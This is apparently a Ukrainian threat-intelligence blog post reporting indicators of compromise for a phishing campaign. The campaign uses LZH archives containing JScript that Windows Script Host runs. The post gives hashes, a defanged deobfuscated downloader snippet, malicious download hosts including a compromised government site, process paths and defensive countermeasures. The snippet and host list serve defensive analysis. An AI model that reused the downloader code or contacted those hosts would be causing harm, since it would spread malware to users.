IOC_lzh_190718

Усім привіт.

Фіксуємо спроби доставки шкідливого коду через JS скрипти (WSH) у оболонці LZH архівів.

Нічого нового, проте у тих, хто не подбав про контроль/заборону WSH будуть проблеми.

Трохи аналітики:

  • фішинг примітивний, не персоналізований
  • скрипт один, містить два посилання
  • payload не кодований !This program cannot be run in DOS mode.
  • прав Адміністратора не потребує
  • на Office 2007 та 2010 вилітає з помилкою
  • кінцева мета payload поки не встановлена

Схема атаки

email attach lzh (JS) > WSH > GET > \Users\*\AppData\Roaming\Microsoft\Windows\Templates\random.exe

Зверніть увагу на скомпрометований сайт Полтавського обласного управління водних ресурсів, що розповсюджує malware:

Маркери

архів

SHA-256               7343bb8098af8785dfee2e9c3bb2edd109aca75a2f1a2f1890faf25a28f46029
File name            рахунок до оплати зг. дог. 57 ФОП Ушаньов Д.О.zip.lzh
File size 81.59 KB

скрипт

SHA-256               042e079b1acc7bec5076077b8d0df8582ec3b7b675e1777c3a91f3159f71ea24
File name            за оренду рах. №118 ФОП Ушаньов Д.О.xls.js
File size 57.94 KB

payload

SHA-256               3d2777b748e805c0463c0c6d0fef8280ad197bea1dd0a25e30ed71199989a6b9
File name            zakup.exe
File size 223 KB

Деобфускований скрипт:

“var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe”;

HTTP.Open(“GET”, “h11p:\poltavavodgosp{.} gov.ua/doc/zakup.exe”, false

{ HTTP.Open(“GET”, “h11p:\avtodoskadoc{.} top/zakupki/peremena.exe”, false)”

 

Мережа

194.0.200.13     poltavavodgosp{.} gov.ua     GET /doc/zakup.exe          Mozilla/4.0
149.129.215.193  avtodoskadoc{.} top          GET/zakupki/peremena.exe    Mozilla/4.0

 

Процеси

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\118.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\209790.exe"
C:\Windows\splwow64.exe 8192

Контрзаходи

  • Фільтр приєднань на рівні Email – див. тут
  • Заборона завантаження запускних на рівні Proxy – див. тут
  • Заборона створення та зчитування js, jse, vb, vbe та ін скриптових файлів в профілі користувача
  • Заборона створення та запуску нових exe в профілі користувача – див. тут
  • Заборона мережевого трафіку для WSH – див. тут
  • Деактивація WSH – див. тут
  • Фільтрація по User Agent на рівні Proxy

Будьте уважні та обережні.

VR

Advertisements

Tags: , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: